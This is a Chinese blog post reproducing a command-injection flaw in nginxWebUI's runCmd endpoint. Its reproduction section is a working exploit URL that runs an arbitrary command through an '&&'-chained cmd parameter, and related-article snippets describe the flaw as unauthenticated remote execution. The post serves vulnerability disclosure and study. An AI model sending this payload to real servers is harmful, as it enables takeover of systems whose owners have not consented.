nginxWebUI runCmd命令执行漏洞复现

最新推荐文章于 2024-08-14 11:37:31 发布
最新推荐文章于 2024-08-14 11:37:31 发布
阅读量467 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/131919959
版权
NginxWebUI是一个用于图形化配置nginx的工具,支持http和tcp转发、反向代理等功能。文章揭示了一个安全问题,通过访问特定URL如/AdminPage/conf/runCmd?cmd=id&&echonginx,可能存在命令注入漏洞,允许执行任意命令。这表明工具在处理用户输入时可能存在安全风险,需要及时修复以防止潜在攻击。
摘要由CSDN通过智能技术生成

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx

url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现 || NginxWebUI 后台命令执行&runCmd远程命令执行
失心少年
07-05 765
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。1.前台使用GET方式利用如下POC执行id命令
漏洞复现nginxWebUI 存在前台远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-09 2248
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI 存在前台远程命令执行漏洞,攻击者通过该漏洞获取服务器控制权限进而进一步获取敏感数据信息。
NginxWEBUI框架RCE任意命令执行漏洞深度分析(含Poc和EXP)
qq_29616295的博客
08-18 1143
NginxWEBUI任意命令执行漏洞深度解析
nginxWebUI runCmd RCE漏洞复现
0xSec
06-27 2890
nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。
nginxWebUI 存在前台远程命令执行漏洞,安装以及复现过程
lianhe20040122的博客
11-07 383
方便快捷易用的Nginx可视化UI网页管理部署配置工具系统,使用Web网页系统来快速配置部署,支持在线配置你的Nginx/Openresty的反向代理、负载均衡、SSL/HTTPS证书免费签发,自动续签、TCP/UDP 3-4层转发、可以自定义参数字段、均衡负载节点、Nginx服务状态监控故障报警、集群配置同步等,快速部署多个或N个Nginx集群节点,支持导入现有Nginx配置文件让你无忧使用。
docker run起来之后执行多条命令
09-30
docker run :创建一个新的容器并运行一个命令。这篇文章主要介绍了docker run起来之后执行多条命令 ,需要的朋友可以参考下
Test_RunCMD.zip
07-01
本项目"Test_RunCMD.zip"是一个基于C#语言的Winform应用程序,旨在演示如何在C#环境下调用CMD命令提示符)来执行命令和BAT(批处理)文件。下面将详细阐述相关知识点: 1. **C#调用CMD执行命令**: 在C#中,可以...
Js使用WScript.Shell对象执行.bat文件和cmd命令
10-25
在Windows环境中,JavaScript可以通过WScript.Shell对象来与操作系统进行交互,执行一系列系统级别的操作,例如运行批处理文件(.bat)和命令提示符(CMD)命令。WScript.Shell是Windows Script Host (WSH)的一部分,它...
CMD命令执行
02-21
CMD命令执行是Windows操作系统中的命令行接口,它允许用户通过文本命令执行各种系统操作,如文件管理、系统设置和程序控制等。在CMD中,我们可以执行一系列的命令,以实现自动化任务,诊断问题,或者在没有图形...
C#隐式运行CMD命令(隐藏命令窗口)
09-03
在C#编程中,有时我们需要在应用程序中执行命令行(CMD命令,但不希望显示命令提示符窗口。本文将详细介绍如何使用C#隐式运行CMD命令并隐藏命令窗口,特别是在WinForm应用中。 首先,要实现这个功能,我们需要...
nginx界面管理工具之nginxWebUI 搭建与使用
Riky12的博客
03-29 3988
官网地址: http://www.nginxwebui.cn源码地址:https://git.chihiro.org.cn/chihiro/nginxWebUI
nginxWebUI 远程命令执行漏洞
m0_49025459的博客
06-29 896
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令
万字解析文件fd,深刻理解:fd文件描述符、位图、标准输入、标准输出、标准错误、文件打开、文件关闭、Linux一切皆文件理解、进程和文件的关系、虚拟软件系统
qq_51216031的博客
08-08 674
什么是文件?打开文件是什么意思?怎么打开文件?关闭文件又是什么意思?怎么关闭文件?打开的文件怎么管理?关闭的文件又怎么管理?为什么要管理?如何管理?文件路径是什么意思?什么是位图?我们不能仅从语言角度去理解文件,还需要站在操作系统的角度去理解才能全面。所以,本文将会从操作系统的角度去深刻理解文件。同时,回答上述的若干问题。
在终端上通过SSH登录到指定IP地址的服务器
pdc31czy的博客
08-08 306
进入后输入密码(密码在输入的时候是不显示的,注意大小写),这样就可以登入服务器。比如如果需要登入学校的服务器,一般需要连接学校的内网VPN才能登入。ip地址:12.345.67.890。假如失败了,有可能是网络问题。
美国服务器稳定么?影响服务器稳定性的6个因素
petaexpress的博客
08-09 595
美国服务器的稳定性是相当不错的,这主要得益于其先进的技术、成熟的基础设施以及严格的管理措施。美国拥有众多知名的服务器提供商,这些提供商通常会采用顶级的硬件设施,如英特尔、AMD等知名品牌的处理器,以及三星、金士顿等品牌的内存和硬盘,这些硬件设备在全球范围内具有较高的市场份额和良好的口碑,性能稳定可靠。
vsftpd 文件服务器A中的文件,需复制到B服务器,关闭防火墙,A的文件可以复制到B,打开防火墙,就复制失败分析原因分析和rsync实现文件同步
雨笋情缘的专栏
08-12 652
确认防火墙配置是否允许FTP流量通过。调整VSFTPD配置以启用被动模式并指定合适的端口范围。考虑使用SFTP、SCP或rsync作为替代方案。请根据实际情况调整上述建议。如果有具体的操作系统版本或者详细的VSFTPD配置信息,我可以提供更加具体的帮助。
当node节点kubectl 命令无法连接到 Kubernetes API 服务器
qq_40914472的博客
08-09 335
节点上 kubectl 命令无法连接到 Kubernetes API 服务器并显示 The connection to the server localhost:8080 was refused - did you specify the right host or port?
SaaS系统如何选择合适的服务器
最新发布
qq177803623的博客
08-14 339
服务器:考虑使用云服务器(如AWS、Azure、Google Cloud等),它们提供灵活的付费模型和弹性扩展功能,可以根据实际需求动态调整服务器的配置和数量。高可用性和冗余配置:选择具有高可用性和冗余配置的服务器,如具有热备份和冗余电源的服务器,以及支持自动故障转移和备份功能的服务器集群。内存(RAM):确保服务器有足够的内存来存储系统运行时所需的数据和变量,内存大小应根据系统的规模和预期的并发用户数进行选择。防火墙和入侵检测:选择具有强大防火墙和入侵检测功能的服务器,以防止未经授权的访问和数据泄露。
Linux 基本指令讲解 上
Mike的博客
08-13 1830
clear清屏Alt Enter全屏/退出全屏pwd显示当前用户所处路径cd改变目录mkdir创建一个文件夹(d)rmdir默认只能删除空文件夹(空目录)ls显示当前目录下的文件,ls 默认只会显示文件名这个属性。可以是 0 个或多个,多个选项都是用空格分隔whoami输出当前用户是谁touchrm删除文件cp拷贝命令tree以树形输出路径which输出文件的路径alias给其他命令起别名,但都是临时的,当重启后就会恢复。
nginxwebui runcmd
09-27
使用 nginxwebui runcmd,用户可以方便地执行各种 Nginx 相关的命令,无需使用命令行界面。这个工具包括了常见的 Nginx 操作,如启动和停止 Nginx 服务器、重载配置文件、查看服务器状态等。用户可以通过简单的点击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值